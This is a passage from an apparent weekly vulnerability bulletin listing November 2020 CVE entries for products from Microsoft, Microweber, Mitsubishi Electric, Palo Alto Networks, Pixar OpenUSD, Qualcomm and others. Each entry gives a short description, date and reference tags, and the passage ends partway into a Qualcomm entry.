microsoft — word
 
Microsoft Word Security Feature Bypass Vulnerability 2020-11-11 not yet calculated CVE-2020-17020
MISC
microweber — microweber
 
Microweber v1.1.18 is affected by no session expiry after log-out. 2020-11-09 not yet calculated CVE-2020-23136
MISC
MISC
microweber — microweber
 
Microweber 1.1.18 is affected by broken authentication and session management. Local session hijacking may occur, which could result in unauthorized access to system data or functionality, or a complete system compromise. 2020-11-09 not yet calculated CVE-2020-23139
MISC
microweber — microweber
 
An unrestricted file upload vulnerability was discovered in the Microweber 1.1.18 admin account page. An attacker can upload PHP code or any extension (eg- .exe) to the web server by providing image data and the image/jpeg content type with a .php extension. 2020-11-09 not yet calculated CVE-2020-23138
MISC
MISC
microweber — microweber
 
Microweber 1.1.18 is affected by insufficient session expiration. When changing passwords, both sessions for when a user changes email and old sessions in any other browser or device, the session does not expire and remains active. 2020-11-09 not yet calculated CVE-2020-23140
MISC
mit — kerberos_5
 
MIT Kerberos 5 (aka krb5) before 1.17.2 and 1.18.x before 1.18.3 allows unbounded recursion via an ASN.1-encoded Kerberos message because the lib/krb5/asn.1/asn1_encode.c support for BER indefinite lengths lacks a recursion limit. 2020-11-06 not yet calculated CVE-2020-28196
CONFIRM
MLIST
FEDORA
FEDORA
GENTOO
mitel — shoretel_19.46.1802.0_devices
 
The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page. 2020-11-09 not yet calculated CVE-2020-28351
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got1000_series
 
Resource management error vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QMBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QLBDE CoreOS version “05.65.00.BD” and earlier, GT1455HS-QTBDE CoreOS version “05.65.00.BD” and earlier, and GT1450HS-QMBDE CoreOS version “05.65.00.BD” and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5649
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got1000_series
 
Improper neutralization of argument delimiters in a command (‘Argument Injection’) vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QMBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QLBDE CoreOS version “05.65.00.BD” and earlier, GT1455HS-QTBDE CoreOS version “05.65.00.BD” and earlier, and GT1450HS-QMBDE CoreOS version “05.65.00.BD” and earlier) allows unauthenticated attackers on adjacent network to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5648
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got1000_series
 
Session fixation vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QMBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QLBDE CoreOS version “05.65.00.BD” and earlier, GT1455HS-QTBDE CoreOS version “05.65.00.BD” and earlier, and GT1450HS-QMBDE CoreOS version “05.65.00.BD” and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5645
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got1000_series
 
Buffer overflow vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QMBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QLBDE CoreOS version “05.65.00.BD” and earlier, GT1455HS-QTBDE CoreOS version “05.65.00.BD” and earlier, and GT1450HS-QMBDE CoreOS version “05.65.00.BD” and earlier) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5644
MISC
MISC
MISC
MISC
mitsubishi_electric — gt14_model_of_got1000_series
 
NULL pointer dereferences vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QMBDE CoreOS version “05.65.00.BD” and earlier, GT1450-QLBDE CoreOS version “05.65.00.BD” and earlier, GT1455HS-QTBDE CoreOS version “05.65.00.BD” and earlier, and GT1450HS-QMBDE CoreOS version “05.65.00.BD” and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet. 2020-11-06 not yet calculated CVE-2020-5646
MISC
MISC
MISC
MISC
moinmoin — moinmoin
 
MoinMoin is a wiki engine. In MoinMoin before version 1.9.11, an attacker with write permissions can upload an SVG file that contains malicious javascript. This javascript will be executed in a user’s browser when the user is viewing that SVG file on the wiki. Users are strongly advised to upgrade to a patched version. MoinMoin Wiki 1.9.11 has the necessary fixes and also contains other important fixes. 2020-11-11 not yet calculated CVE-2020-15275
MISC
MISC
CONFIRM
moinmoin — moinmoin
 
The cache action in action/cache.py in MoinMoin through 1.9.10 allows directory traversal through a crafted HTTP request. An attacker who can upload attachments to the wiki can use this to achieve remote code execution. 2020-11-10 not yet calculated CVE-2020-25074
MISC
MISC
MLIST
DEBIAN
nagios — nagios_xi
 
Improper preservation of permissions in Nagios XI 5.7.4 allows a local, low-privileged, authenticated user to weaken the permissions of files, resulting in low-privileged users being able to write to and execute arbitrary PHP code with root privileges. 2020-11-13 not yet calculated CVE-2020-5796
MISC
netapp — element_software_and_hci
 
Element Software versions prior to 12.2 and HCI versions prior to 1.8P1 are susceptible to a vulnerability which could allow an authenticated user to view sensitive information. 2020-11-13 not yet calculated CVE-2020-8582
MISC
netapp — element_software_and_hci
 
Element Software versions prior to 12.2 and HCI versions prior to 1.8P1 are susceptible to a vulnerability which could allow an attacker to discover sensitive information by intercepting its transmission within an https session. 2020-11-13 not yet calculated CVE-2020-8583
MISC
netflix — dispatch
 
The Access Control issues include allowing a regular user to view a restricted incident, user role escalation to admin, users adding themselves as a participant in a restricted incident, and users able to view restricted incidents via the search feature. If your install has followed the secure deployment guidelines the risk of this is lowered, as this may only be exploited by an authenticated user. 2020-11-09 not yet calculated CVE-2020-9300
MISC
MISC
netflix — dispatch
 
There were XSS vulnerabilities discovered and reported in the Dispatch application, affecting name and description parameters of Incident Priority, Incident Type, Tag Type, and Incident Filter. This vulnerability can be exploited by an authenticated user. 2020-11-09 not yet calculated CVE-2020-9299
MISC
MISC
netgear — multiple_devices
 
upnpd on certain NETGEAR devices allows remote (LAN) attackers to execute arbitrary code via a stack-based buffer overflow. This affects R6400v2 V1.0.4.102_10.0.75, R6400 V1.0.1.62_1.0.41, R7000P V1.3.2.126_10.1.66, XR300 V1.0.3.50_10.3.36, R8000 V1.0.4.62, R8300 V1.0.2.136, R8500 V1.0.2.136, R7300DST V1.0.0.74, R7850 V1.0.5.64, R7900 V1.0.4.30, RAX20 V1.0.2.64, RAX80 V1.0.3.102, and R6250 V1.0.4.44. 2020-11-09 not yet calculated CVE-2020-28373
MISC
nexcom — nio_50
 
The affected product does not properly validate input, which may allow an attacker to execute a denial-of-service attack on the NIO 50 (all versions). 2020-11-13 not yet calculated CVE-2020-25151
MISC
nexcom — nio_50
 
The affected product transmits unencrypted sensitive information, which may allow an attacker to access this information on the NIO 50 (all versions). 2020-11-13 not yet calculated CVE-2020-25155
MISC
nextcloud — nextcloud_server
 
A cryptographic issue in Nextcloud Server 19.0.1 allowed an attacker to downgrade the encryption scheme and break the integrity of encrypted files. 2020-11-09 not yet calculated CVE-2020-8150
MISC
MISC
nextcloud — nextcloud_server
 
A wrong generation of the passphrase for the encrypted block in Nextcloud Server 19.0.1 allowed an attacker to overwrite blocks in a file. 2020-11-09 not yet calculated CVE-2020-8133
MISC
MISC
nodemailer — nodemailer
 
This affects the package nodemailer before 6.4.16. Use of crafted recipient email addresses may result in arbitrary command flag injection in sendmail transport for sending mails. 2020-11-12 not yet calculated CVE-2020-7769
MISC
MISC
MISC
MISC
nvidia — geforce_now
 
NVIDIA GeForce NOW application software on Windows, all versions prior to 2.0.25.119, contains a vulnerability in its open-source software dependency in which the OpenSSL library is vulnerable to binary planting attacks by a local user, which may lead to code execution or escalation of privileges. 2020-11-11 not yet calculated CVE-2020-5992
CONFIRM
object-hierarchy-access — object-hierarchy-access
 
Overview:Prototype pollution vulnerability in ‘object-hierarchy-access’ versions 0.2.0 through 0.32.0 allows attacker to cause a denial of service and may lead to remote code execution. 2020-11-12 not yet calculated CVE-2020-28270
MISC
MISC
one_identity_password_manager — one_identity_password_manager
 
An issue was discovered in One Identity Password Manager 5.8. An attacker could enumerate valid answers for a user. It is possible for an attacker to detect a valid answer based on the HTTP response content, and reuse this answer later for a password reset on a chosen password. The enumeration is possible because, within the HTTP response content, WRONG ID is only returned when the answer is incorrect. 2020-11-13 not yet calculated CVE-2020-7962
MISC
opera — opera_touch_for_ios
 
Opera Touch for iOS before version 2.4.5 is vulnerable to an address bar spoofing attack. The vulnerability allows a malicious page to trick the browser into showing an address of a different page. This may allow the malicious page to impersonate another page and trick a user into providing sensitive data. 2020-11-13 not yet calculated CVE-2020-6157
MISC
packagekit — packagekit
 
PackageKit provided detailed error messages to unprivileged callers that exposed information about file presence and mimetype of files that the user would be unable to determine on its own. 2020-11-07 not yet calculated CVE-2020-16121
CONFIRM
MISC
packagekit — packagekit
 
PackageKit’s apt backend mistakenly treated all local debs as trusted. The apt security model is based on repository trust and not on the contents of individual files. On sites with configured PolicyKit rules this may allow users to install malicious packages. 2020-11-07 not yet calculated CVE-2020-16122
CONFIRM
palo_alto_network — pan-os An information exposure through log file vulnerability exists where the password for the configured system proxy server for a PAN-OS appliance may be displayed in cleartext when using the CLI in Palo Alto Networks PAN-OS software. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.17; PAN-OS 9.0 versions earlier than PAN-OS 9.0.11; PAN-OS 9.1 versions earlier than PAN-OS 9.1.2. 2020-11-12 not yet calculated CVE-2020-2048
CONFIRM
palo_alto_network — pan-os
 
An OS command injection and memory corruption vulnerability in the PAN-OS management web interface that allows authenticated administrators to disrupt system processes and potentially execute arbitrary code and OS commands with root privileges. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.10; PAN-OS 9.1 versions earlier than PAN-OS 9.1.4; PAN-OS 10.0 versions earlier than PAN-OS 10.0.1. 2020-11-12 not yet calculated CVE-2020-2000
CONFIRM
palo_alto_network — pan-os
 
An authentication bypass vulnerability exists in the GlobalProtect SSL VPN component of Palo Alto Networks PAN-OS software that allows an attacker to bypass all client certificate checks with an invalid certificate. A remote attacker can successfully authenticate as any user and gain access to restricted VPN network resources when the gateway or portal is configured to rely entirely on certificate-based authentication. Impacted features that use SSL VPN with client certificate verification are: GlobalProtect Gateway, GlobalProtect Portal, GlobalProtect Clientless VPN In configurations where client certificate verification is used in conjunction with other authentication methods, the protections added by the certificate check are ignored as a result of this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.17; PAN-OS 9.0 versions earlier than PAN-OS 9.0.11; PAN-OS 9.1 versions earlier than PAN-OS 9.1.5; PAN-OS 10.0 versions earlier than PAN-OS 10.0.1. 2020-11-12 not yet calculated CVE-2020-2050
CONFIRM
palo_alto_network — pan-os
 
A vulnerability exists in the Palo Alto Network PAN-OS signature-based threat detection engine that allows an attacker to communicate with devices in the network in a way that is not analyzed for threats by sending data through specifically crafted TCP packets. This technique evades signature-based threat detection. This issue impacts: PAN-OS 8.1 versions earlier than 8.1.17; PAN-OS 9.0 versions earlier than 9.0.11; PAN-OS 9.1 versions earlier than 9.1.5; All versions of PAN-OS 7.1 and PAN-OS 8.0. 2020-11-12 not yet calculated CVE-2020-1999
CONFIRM
palo_alto_network — pan-os
 
An information exposure vulnerability exists in Palo Alto Networks Panorama software that discloses the token for the Panorama web interface administrator’s session to a managed device when the Panorama administrator performs a context switch into that device. This vulnerability allows an attacker to gain privileged access to the Panorama web interface. An attacker requires some knowledge of managed firewalls to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.17; PAN-OS 9.0 versions earlier than PAN-OS 9.0.11; PAN-OS 9.1 versions earlier than PAN-OS 9.1.5. 2020-11-12 not yet calculated CVE-2020-2022
CONFIRM
passmark — mulitple_products
 
An issue was discovered in PassMark BurnInTest v9.1 Build 1008, OSForensics v7.1 Build 1012, and PerformanceTest v10.0 Build 1008. The kernel driver exposes IOCTL functionality that allows low-privilege users to map arbitrary physical memory into the address space of the calling process. This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo32.sys and DirectIo64.sys drivers. This issue is fixed in BurnInTest v9.2, PerformanceTest v10.0 Build 1009, OSForensics v8.0. 2020-11-13 not yet calculated CVE-2020-15481
MISC
MISC
percona — percona_server
 
An issue was discovered in the MongoDB Simple LDAP plugin through 2020-10-02 for Percona Server when using the SimpleLDAP authentication in conjunction with Microsoft’s Active Directory, Percona has discovered a flaw that would allow authentication to complete when passing a blank value for the account password, leading to access against the service integrated with which Active Directory is deployed at the level granted to the authenticating account. 2020-11-09 not yet calculated CVE-2020-26542
MISC
MISC
CONFIRM
CONFIRM
pixar — openusd
 
A heap overflow vulnerability exists in the Pixar OpenUSD 20.05 while parsing compressed value rep arrays in binary USD files. A specially crafted malformed file can trigger a heap overflow, which can result in remote code execution. To trigger this vulnerability, the victim needs to access an attacker-provided malformed file. 2020-11-13 not yet calculated CVE-2020-6155
MISC
pixar — openusd
 
A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. This instance exists in the USDC file format FIELDS section decompression heap overflow. 2020-11-13 not yet calculated CVE-2020-6147
FULLDISC
MISC
pixar — openusd
 
A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. To trigger this vulnerability, the victim needs to open an attacker-provided malformed file in an instance in USDC file format PATHS section. 2020-11-13 not yet calculated CVE-2020-6149
MISC
pixar — openusd
 
A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. To trigger this vulnerability, the victim needs to open an attacker-provided malformed file in an instance USDC file format path element token index. 2020-11-13 not yet calculated CVE-2020-6156
MISC
pixar — openusd
 
A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. An instance exists in USDC file format FIELDSETS section decompression heap overflow. 2020-11-13 not yet calculated CVE-2020-6148
MISC
pixar — openusd
 
A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software USDC file format SPECS section decompression heap overflow. 2020-11-13 not yet calculated CVE-2020-6150
MISC
python-rsa — python-rsa
 
It was found that python-rsa is vulnerable to Bleichenbacher timing attacks. An attacker can use this flaw via the RSA decryption API to decrypt parts of the cipher text encrypted with RSA. 2020-11-12 not yet calculated CVE-2020-25658
CONFIRM
MISC
qualcomm — multiple_snapdragon_products u’Arbitrary access to DSP memory due to improper check in loaded library for data received from CPU side’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in QCM6125, QCS410, QCS603, QCS605, QCS610, QCS6125, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDA640, SDA845, SDM640, SDM830, SDM845, SDX50M, SDX55, SDX55M, SM6125, SM6150, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM8150, SM8150P 2020-11-12 not yet calculated CVE-2020-11201
CONFIRM
qualcomm — multiple_snapdragon_products u’Buffer over read can happen while parsing mkv clip due to improper typecasting of data returned from atomsize’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8009W, APQ8017, APQ8037, APQ8053, APQ8064AU, APQ8096, APQ8096AU, APQ8096SG, APQ8098, MDM9206, MDM9650, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8996SG, MSM8998, QCM4290, QCM6125, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QCS6125, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDA429W, SDA640, SDA660, SDA670, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM830, SDM845, SDW2500, SDX20, SDX20M, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330 2020-11-12 not yet calculated CVE-2020-11193
CONFIRM
qualcomm — multiple_snapdragon_products u’Out of Bound issue in DSP services while processing received arguments due to improper validation of length received as an argument’ in SD820, SD821, SD820, QCS603, QCS605, SDA855, SA6155P, SA6145P, SA6155, SA6155P, SD855, SD 675, SD660, SD429, SD439 2020-11-12 not yet calculated CVE-2020-11208
CONFIRM
qualcomm — multiple_snapdragon_products u’Possible buffer overflow in WMA message processing due to integer overflow occurs when processing command received from user space’ in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music in APQ8009, APQ8053, APQ8096AU, MDM9206, MDM9250, MDM9628, MDM9640, MDM9650, MSM8996AU, QCS405, SDA845, SDX20, SDX20M, WCD9330 2020-11-12 not yet calculated CVE-2020-11131
CONFIRM
qualcomm — multiple_snapdragon_products u’Use after free issue in Bluetooth transport driver when a method in the object is accessed after the object has been deleted due to improper timer handling.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009W, MSM8909W, QCS605, QM215, SA6155, SA6155P, SA8155, SA8155P, SDA640, SDA670, SDA855, SDM1000, SDM640, SDM670, SDM710, SDM845, SDX50M, SDX55, SDX55M, SM6125, SM6350, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR1120, SXR1130, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11175
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Integer overflow can cause a buffer overflow due to lack of table length check in the extensible boot Loader during the validation of security metadata while processing objects to be loaded’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in MDM9205, QCM4290, QCS405, QCS410, QCS4290, QCS610, QSM8250, SA415M, SA515M, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180X+SDX55, SC8180XP, SDA640, SDA845, SDA855, SDM1000, SDM640, SDM830, SDM845, SDM850, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11127
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Improper authorization in DSP process could allow unauthorized users to downgrade the library versions in SD820, SD821, SD820, QCS603, QCS605, SDA855, SA6155P, SA6145P, SA6155, SA6155P, SD855, SD 675, SD660, SD429, SD439 2020-11-12 not yet calculated CVE-2020-11209
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Possible buffer overflow in Fastrpc while handling received parameters due to lack of validation on input parameters’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8098, MSM8998, QCM4290, QCM6125, QCS410, QCS4290, QCS610, QCS6125, QSM8250, QSM8350, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SDA640, SDA660, SDA845, SDA855, SDM640, SDM660, SDM830, SDM845, SDM850, SDX50M, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11206
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’information disclosure in gatekeeper trustzone implementation as the throttling mechanism to prevent brute force attempts at getting user`s lock-screen password can be bypassed by performing the standard gatekeeper operations.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8009W, APQ8017, APQ8037, APQ8053, APQ8064AU, APQ8096, APQ8096AU, APQ8096SG, APQ8098, MDM8207, MDM9150, MDM9205, MDM9206, MDM9207, MDM9250, MDM9607, MDM9628, MDM9640, MDM9650, MDM9655, MSM8108, MSM8208, MSM8209, MSM8608, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8996SG, MSM8998, QCM4290, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QM215, QSM8250, QSM8350, SA415M, SA515M, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180XP, SDA429W, SDA640, SDA660, SDA670, SDA845, SDA855, SDM1000, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM712, SDM830, SDM845, SDM850, SDW2500, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330 2020-11-12 not yet calculated CVE-2020-11123
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Integer overflow to buffer overflow occurs while playback of ASF clip having unexpected number of codec entries’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8009W, APQ8017, APQ8037, APQ8053, APQ8064AU, APQ8096, APQ8096AU, APQ8096SG, APQ8098, MDM9206, MDM9650, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8996SG, MSM8998, QCM4290, QCM6125, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QCS6125, QM215, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SDA429W, SDA640, SDA660, SDA670, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM830, SDM845, SDW2500, SDX20, SDX20M, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330 2020-11-12 not yet calculated CVE-2020-11196
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Incorrect validation of ring context fetched from host memory can lead to memory overflow’ in Snapdragon Compute, Snapdragon Mobile in QSM8350, SC7180, SDX55, SDX55M, SM6150, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-3632
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Buffer overflow in LibFastCV library due to improper size checks with respect to buffer length’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8052, APQ8056, APQ8076, APQ8096, APQ8096SG, APQ8098, MDM9655, MSM8952, MSM8956, MSM8976, MSM8976SG, MSM8996, MSM8996SG, MSM8998, QCM4290, QCM6125, QCS410, QCS4290, QCS610, QCS6125, QSM8250, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SDA640, SDA660, SDA845, SDA855, SDM640, SDM660, SDM830, SDM845, SDM850, SDX50M, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11207
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Possible buffer overflow in WIFI hal process due to copying data without checking the buffer length’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile in QCM4290, QCS4290, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SC8180X, SC8180XP, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11130
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Possible integer overflow to heap overflow while processing command due to lack of check of packet length received’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Mobile in QSM8350, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155P, SA8195P, SDX55M, SM8250, SM8350, SM8350P, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11205
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Possible buffer overflow in WIFI hal process due to usage of memcpy without checking length of destination buffer’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile in QCM4290, QCS4290, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SC8180X, SC8180XP, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11121
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Buffer overflow/underflow occurs when typecasting the buffer passed by CPU internally in the library which is not aligned with the actual size of the structure’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in QCM6125, QCS410, QCS603, QCS605, QCS610, QCS6125, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDA640, SDA670, SDA845, SDM640, SDM670, SDM710, SDM830, SDM845, SDX50M, SDX55, SDX55M, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM8150, SM8150P 2020-11-12 not yet calculated CVE-2020-11202
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Buffer over read in boot due to size check ignored before copying GUID attribute from request to response’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8096AU, APQ8098, MDM8207, MDM9150, MDM9205, MDM9206, MDM9207, MDM9250, MDM9607, MDM9628, MDM9650, MSM8108, MSM8208, MSM8209, MSM8608, MSM8905, MSM8909, MSM8998, QCM4290, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QSM8250, SA415M, SA515M, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180X+SDX55, SC8180XP, SDA640, SDA670, SDA845, SDA855, SDM1000, SDM640, SDM670, SDM710, SDM712, SDM830, SDM845, SDM850, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330 2020-11-12 not yet calculated CVE-2020-11132
CONFIRM
qualcomm — multiple_snapdragon_products
 
u’Possible buffer overflow will occur in video while parsing mp4 clip with crafted esds atom size.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile in QCM4290, QCS4290, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P 2020-11-12 not yet calculated CVE-2020-11184
CONFIRM
qualcomm — multiple_snapdragon_products
 
